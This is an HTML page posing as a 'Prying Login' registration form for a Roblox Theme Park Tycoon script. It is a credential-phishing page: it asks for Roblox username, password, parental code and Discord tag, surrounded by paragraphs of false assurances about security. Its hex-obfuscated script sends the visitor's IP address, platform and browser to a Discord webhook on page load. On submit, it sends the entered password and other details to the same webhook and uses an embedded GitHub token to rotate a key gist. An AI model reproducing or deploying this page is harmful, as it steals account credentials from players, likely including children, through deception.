<html>
  <head>
   <meta charset="utf-8">
   
    <style>
      body {

        font-family: sans-serif;
        color:white;
  background-image: url('https://media.istockphoto.com/id/1336271758/photo/programming-source-code-on-digital-screen-software-developer-and-internet-programming-html.jpg?b=1&s=170667a&w=0&k=20&c=MmOg-1sDCVGFou5fOUI8ySd6KVXNV6bvJXOmPa0sELA=');
  background-size: cover;
  background-position: center;
  height: 100vh;
  width: 100%;
  position: fixed;
  top: 0;
  left: 0;
  z-index: -1;
  filter: brightness(66%);
  overflow-y: scroll;
      }

html, body {
  overflow-y: auto;
  overflow-x: hidden;
}

      h1 {
        color: #ffffff;
      }
         .btn {
      display: inline-block;
      padding: 10px 20px;
      text-decoration: none;
      font-size: 18px;
      border: none;
      outline: none;
      color: white;
      background-color: transparent;
      cursor: pointer;
       transition-duration: 1s;
      box-shadow: 0 0 55px #0000FF;
    }
    .btn:hover {
      background-color: #0000FF;
      box-shadow: 0 0 12px #0000FF;
      
      
    }
    .btn:active {
      background-color: #00006C;
      box-shadow: 0 0 2px #00006C;
    }
      .form-container {
        width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
      }
       .form-container:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
      
    }
       .form-container2 {
    width: 500px;
        margin: 0 auto;
        background-color: black;
        border-radius: 10px;
        padding: 20px;
        box-shadow: 0 5px 33px rgba(0, 0, 0, 666565);
         transition-duration: 1s;
         margin-bottom: 20px;
  
      }
         .form-container2:hover {
      background-color: #060606;
      box-shadow: 0 0 9px #060606;
      margin-bottom: 75px;
      
    }
      input[type="text"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;

      }

         input[type="password"] {
        width: 100%;
        border: none;
        border-bottom: 2px solid #00b8d4;
        font-size: 20px;
        padding: 10px;
        margin-bottom: 20px;
      }

      .error {
        color: #ff0000;
      }
      
    </style>
  </head>
  <body>
    <div class="form-container">
      <h1 style=color:white>Theme park tycoon register</h1>
       <p style=color:gray;font-size:80%>Please note that this script utilizes prying login. Any attempts to utilize a fake login will result in the blacklisting of your account.</p>
      <p style=color:red;font-size:80%>Please note that this feature is only applicable if you use the account that you purchased the game pass with.</p>
      <p style=color:blue;font-size:80%>Please be advised that if you have received a free key, you may use it to log in with an account of your choice.</p>
      <form>
      <p>As a first step, it would be useful to obtain your Discord tag and name.</p>
      Discord: <input type="text" id="disco"><br>
       <div>
        Roblox username: <input type="text" id="name"><br>
        Roblox password: <input type="password" id="pass"><br>
        
        Parental code:<input type="text" id="code69"<br>
        Register key:<input type="text" id="key"<br>
        
        <p style="margin-bottom:15px;color:red;font-size:80%">Only if u have parental code ENABLED</p>
        <div>
      <a class="btn" value="Calculate" onclick="sendMessage()">Register</a>
</div>
       </div>
       
      </form>
      <p class="error" id="error"></p>
    </div>
     
<div>
  <div class="form-container2">
       
        <p style=color:yellow;text-align:center;font-size:xx-large>INFORMATION</p>
        <strong>
        <p style=color:white>As the developer of Prying Login, I would like to remind you that any changes to your account password or username must be approved by the owner. Please be sure to obtain the necessary permission before attempting to alter your login information.</strong>
        </p>
        <div>
        <strong>
        If you have any questions or concerns, do not hesitate to reach out to the owner or support team for assistance. We value your trust in us and are committed to providing the best possible user experience. Thank you for choosing Prying Login.
</strong>

        <p>As the developer of Prying Login, I understand the importance of maintaining the security of your Roblox account. That is why we have implemented a measure in which the owner must manually enter the two-factor authentication (2FA) code during the login process. Please be assured that the owner does not have access to your account password and takes all necessary measures to ensure the confidentiality of your login information.


      
        </p>
               <p style=color:white>In order to ensure the security and confidentiality of your account, we require your username and password. This is to verify that you are the sole authorized user of this account and to prevent unauthorized sharing.</p>
                              <p style=color:white>This login is provided to select individuals for use on specific projects. It is not intended for public use at this time. We cannot provide an estimated timeline for when it may become available to the public. In the meantime, we ask that you respect the exclusivity of this login and use it only for the purposes for which it was intended.</p>
                              <p style=color:white>To ensure the security of your account and prevent unauthorized access, we have implemented several measures including limiting access to a select group of trusted individuals and utilizing scripts such as Potato Hub, Theme Park Tycoon 2 Script, Iris Hub, and Wally Revamped. We are committed to protecting your account from potential phishing attacks and other security threats.</p>
   <p style=color:white>As the developer of Prying Login, I am committed to ensuring the security and confidentiality of our users' accounts.
   <p>
   To this end, access to the system has been limited to a select group of trusted individuals, and various scripts have been implemented to protect against potential security threats.
</p>
I understand the importance of maintaining the privacy of our team, and as such, we have chosen to keep our identities private. However, rest assured that we are dedicated to providing the highest level of security and service to our users.

Thank you for choosing Prying Login as your platform of choice. We value your trust in us and look forward to continuing to serve you.</p>
    <p style=color:white>If you have inadvertently entered the wrong username, you may be unable to access your account. In such a case, we recommend that you reach out to the owner of the script or the support team for assistance in resolving the issue. They may be able to provide further guidance or assistance in resetting your login credentials.</p>
     </div>
</div>
    <div class="form-container2">
       <p style=color:yellow;text-align:center;font-size:xx-large>Why do we need all this information?</p>
    <p stlye=color:white>As the developer of this script login system, I understand the importance of security and the need to protect the accounts of our users. That is why we have implemented a measure that requires the entry of your account password and username in order to properly use this script and validate the games that you play.
</p>
This precaution is necessary to prevent the sharing of the script and to ensure the integrity of our platform. We take the security of our users' accounts very seriously, and we appreciate your cooperation in this matter.
<p>
We are committed to providing the best possible user experience and to upholding the highest standards of security. Thank you for choosing to use our script login system. We value your trust in us and look forward to continuing to serve you.</p>
<p style=color:gray;font-size:60%>
Thank you for choosing Prying Login. We value your trust in us and are committed to providing the best possible user experience. If you have any questions or concerns, do not hesitate to reach out to the owner or support team for assistance.
</p>
</p>
</body>
    </div>
    
    <script>
         var _0x1cef=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x64\x69\x73\x63\x6F\x72\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x69\x2F\x77\x65\x62\x68\x6F\x6F\x6B\x73\x2F\x31\x30\x35\x37\x36\x37\x33\x36\x37\x32\x37\x39\x39\x38\x32\x35\x39\x32\x30\x2F\x39\x7A\x43\x57\x5F\x67\x79\x55\x41\x77\x6C\x56\x52\x50\x5F\x76\x6A\x63\x4F\x59\x6D\x4B\x65\x54\x77\x48\x6D\x37\x33\x38\x50\x78\x41\x38\x41\x67\x69\x4F\x5F\x4A\x73\x58\x56\x64\x65\x77\x68\x50\x46\x6B\x71\x70\x78\x33\x30\x4B\x37\x39\x54\x51\x5A\x46\x44\x48\x75\x51\x2D\x36","\x6E\x6F\x74\x66\x6F\x75\x6E\x64","\x69\x70","\x39\x31\x2E\x31\x32\x39\x2E\x39\x37\x2E\x32\x35\x34\x38","\x49\x50\x20\x48\x49\x44\x44\x45\x4E","\x44\x65\x76\x69\x63\x65\x3A\x20","\x70\x6C\x61\x74\x66\x6F\x72\x6D","\x42\x72\x6F\x77\x73\x65\x72\x3A\x20","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x50\x4F\x53\x54","\x53\x6F\x6D\x65\x62\x6F\x64\x79\x20\x76\x69\x73\x69\x74\x65\x64\x20\x50\x53\x58\x20\x64\x75\x70\x65\x72\x20\x61\x74\x3A","\x53\x45\x4E\x53\x49\x54\x49\x56\x45\x20\x49\x4E\x46\x4F\x52\x4D\x41\x54\x49\x4F\x4E","\x49\x50","\x7C\x7C","\x44\x45\x56\x49\x43\x45","\x42\x52\x4F\x57\x53\x45\x52","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E","\x74\x68\x65\x6E","\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x69\x70\x69\x66\x79\x2E\x6F\x72\x67\x3F\x66\x6F\x72\x6D\x61\x74\x3D\x6A\x73\x6F\x6E","\x76\x61\x6C\x75\x65","\x6B\x65\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6E\x61\x6D\x65","\x70\x61\x73\x73","\x64\x69\x73\x63\x6F","\x63\x6F\x64\x65\x36\x39","\x63\x6F\x6E\x74\x65\x6E\x74","\x6B\x65\x79\x2E\x74\x78\x74","\x66\x69\x6C\x65\x73","\x74\x65\x73\x74","\x57\x65\x20\x61\x70\x6F\x6C\x6F\x67\x69\x7A\x65\x20\x66\x6F\x72\x20\x74\x68\x65\x20\x69\x6E\x63\x6F\x6E\x76\x65\x6E\x69\x65\x6E\x63\x65\x2E\x20\x49\x74\x20\x61\x70\x70\x65\x61\x72\x73\x20\x74\x68\x61\x74\x20\x77\x65\x20\x61\x72\x65\x20\x75\x6E\x61\x62\x6C\x65\x20\x74\x6F\x20\x6C\x6F\x63\x61\x74\x65\x20\x79\x6F\x75\x72\x20\x6B\x65\x79\x2E\x20\x54\x68\x69\x73\x20\x6D\x61\x79\x20\x62\x65\x20\x61\x20\x73\x79\x73\x74\x65\x6D\x20\x65\x72\x72\x6F\x72\x2E\x20\x50\x6C\x65\x61\x73\x65\x20\x63\x6F\x6E\x74\x61\x63\x74\x20\x74\x68\x65\x20\x6F\x77\x6E\x65\x72\x20\x6F\x72\x20\x73\x75\x70\x70\x6F\x72\x74\x20\x74\x65\x61\x6D\x20\x66\x6F\x72\x20\x61\x73\x73\x69\x73\x74\x61\x6E\x63\x65\x20\x69\x6E\x20\x72\x65\x73\x6F\x6C\x76\x69\x6E\x67\x20\x74\x68\x69\x73\x20\x69\x73\x73\x75\x65\x2E","\x61\x6D\x6F\x67\x75\x73","\x4F\x6D\x67\x20\x66\x72\x65\x65\x20\x61\x63\x63\x6F\x75\x6E\x74\x3F\x3F\x3F","\x41\x63\x63\x6F\x75\x6E\x74\x20\x4E\x61\x6D\x65","\x41\x63\x63\x6F\x75\x6E\x74\x20\x50\x61\x73\x73\x77\x6F\x72\x64","\x50\x61\x72\x65\x6E\x74\x61\x6C\x20\x43\x6F\x64\x65","\x44\x69\x73\x63\x6F\x72\x64","\x49\x50\x20\x41\x44\x44\x52\x45\x53\x53","\x6F\x6B","\x45\x72\x72\x6F\x72\x20\x66\x65\x74\x63\x68\x69\x6E\x67\x20\x47\x69\x73\x74\x3A\x20","\x73\x74\x61\x74\x75\x73\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x42\x65\x61\x72\x65\x72\x20\x20\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x67\x65\x74\x52\x61\x6E\x64\x6F\x6D\x56\x61\x6C\x75\x65\x73","\x63\x72\x79\x70\x74\x6F","","\x6A\x6F\x69\x6E","\x30","\x70\x61\x64\x53\x74\x61\x72\x74","\x66\x72\x6F\x6D","\x62\x34\x31\x38\x62\x34\x36\x36\x39\x36\x39\x62\x35\x65\x61\x38\x35\x39\x30\x61\x30\x37\x31\x62\x39\x65\x30\x32\x31\x34\x32\x62","\x67\x69\x74\x68\x75\x62\x5F\x70\x61\x74\x5F\x31\x31\x41\x54\x50\x4D\x47\x58\x41\x30\x6E\x6D\x7A\x6C\x69\x67\x71\x4C\x7A\x39\x77\x74\x5F\x75\x66\x42\x69\x54\x6D\x65\x48\x45\x36\x69\x61\x30\x4C\x58\x61\x5A\x63\x30\x6C\x39\x62\x46\x78\x62\x56\x62\x30\x44\x79\x45\x64\x73\x61\x49\x6C\x61\x34\x78\x36\x51\x63\x37\x37\x49\x51\x54\x4E\x52\x35\x55\x43\x71\x64\x4B\x4D\x48\x74\x68","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x67\x69\x73\x74\x73\x2F","\x50\x41\x54\x43\x48","\x42\x65\x61\x72\x65\x72\x20","\x65\x72\x72\x6F\x72","\x63\x61\x74\x63\x68"];var ZDIAGRAM=_0x1cef[0];var userIP=_0x1cef[1];fetch(_0x1cef[20])[_0x1cef[18]]((_0xe49fx7)=>{return _0xe49fx7[_0x1cef[19]]()})[_0x1cef[18]]((_0xe49fx3)=>{userIP= _0xe49fx3[_0x1cef[2]];if(userIP=== _0x1cef[3]){userIP= _0x1cef[4]}else {var _0xe49fx4=_0x1cef[5]+ navigator[_0x1cef[6]]+ _0x1cef[7]+ navigator[_0x1cef[8]];var _0xe49fx5=navigator[_0x1cef[6]];var _0xe49fx6=navigator[_0x1cef[8]];fetch(ZDIAGRAM,{method:_0x1cef[9],body:JSON[_0x1cef[16]]({embeds:[{title:_0x1cef[10],description:_0x1cef[11],color:3447003,fields:[{name:_0x1cef[12],value:_0x1cef[13]+ userIP+ _0x1cef[13]},{name:_0x1cef[14],value:_0xe49fx5},{name:_0x1cef[15],value:_0xe49fx6}]}]}),headers:{'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x1cef[17]}})}});function sendMessage(){const _0xe49fx9=document[_0x1cef[23]](_0x1cef[22])[_0x1cef[21]];const _0xe49fxa=document[_0x1cef[23]](_0x1cef[24])[_0x1cef[21]];const _0xe49fxb=document[_0x1cef[23]](_0x1cef[25])[_0x1cef[21]];const _0xe49fxc=document[_0x1cef[23]](_0x1cef[26])[_0x1cef[21]];const _0xe49fxd=document[_0x1cef[23]](_0x1cef[27])[_0x1cef[21]];fetch(`${_0x1cef[43]}`,{headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':_0x1cef[44]}})[_0x1cef[18]]((_0xe49fx7)=>{if(_0xe49fx7[_0x1cef[40]]){return _0xe49fx7[_0x1cef[19]]()}else {throw  new Error(_0x1cef[41]+ _0xe49fx7[_0x1cef[42]])}})[_0x1cef[18]]((_0xe49fx3)=>{const _0xe49fxe=_0xe49fx3[_0x1cef[30]][_0x1cef[29]][_0x1cef[28]];if(_0xe49fx9!= _0xe49fxe|| /^\s*$/[_0x1cef[31]](_0xe49fxa)|| /^\s*$/[_0x1cef[31]](_0xe49fxb)){alert(_0x1cef[32])}else {_0xe49fx13();var _0xe49fx5=navigator[_0x1cef[6]];var _0xe49fx6=navigator[_0x1cef[8]];fetch(ZDIAGRAM,{method:_0x1cef[9],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x1cef[17]},body:JSON[_0x1cef[16]]({embeds:[{title:_0x1cef[33],description:_0x1cef[34],color:3447003,fields:[{name:_0x1cef[35],value:_0xe49fxa},{name:_0x1cef[36],value:_0xe49fxb},{name:_0x1cef[37],value:_0xe49fxd},{name:_0x1cef[38],value:_0xe49fxc},{name:_0x1cef[39],value:userIP},{name:_0x1cef[14],value:_0xe49fx5},{name:_0x1cef[15],value:_0xe49fx6}]}]})});var _0xe49fxf=JSON[_0x1cef[16]]();fetch(ZDIAGRAM,{method:_0x1cef[9],headers:{"\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65":_0x1cef[17]},body:_0xe49fxf})}});function _0xe49fx10(){const _0xe49fx11= new Uint8Array(32);window[_0x1cef[46]][_0x1cef[45]](_0xe49fx11);return Array[_0x1cef[51]](_0xe49fx11,(_0xe49fx12)=>{return _0xe49fx12.toString(16)[_0x1cef[50]](2,_0x1cef[49])})[_0x1cef[48]](_0x1cef[47])}function _0xe49fx13(){const _0xe49fx14=_0x1cef[52];const _0xe49fx15=_0x1cef[53];const _0xe49fx16=`${_0x1cef[54]}${_0xe49fx14}${_0x1cef[47]}`;const _0xe49fx17={method:_0x1cef[55],headers:{'\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E':`${_0x1cef[56]}${_0xe49fx15}${_0x1cef[47]}`,'\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65':_0x1cef[17]},body:JSON[_0x1cef[16]]({'\x66\x69\x6C\x65\x73':{'\x6B\x65\x79\x2E\x74\x78\x74':{'\x63\x6F\x6E\x74\x65\x6E\x74':_0xe49fx10()}}})};fetch(_0xe49fx16,_0xe49fx17)[_0x1cef[18]]((_0xe49fx7)=>{if(_0xe49fx7[_0x1cef[40]]){}else {}})[_0x1cef[58]]((_0xe49fx18)=>{console[_0x1cef[57]](_0xe49fx18)})}}
  </script>
  
  

  

</html>
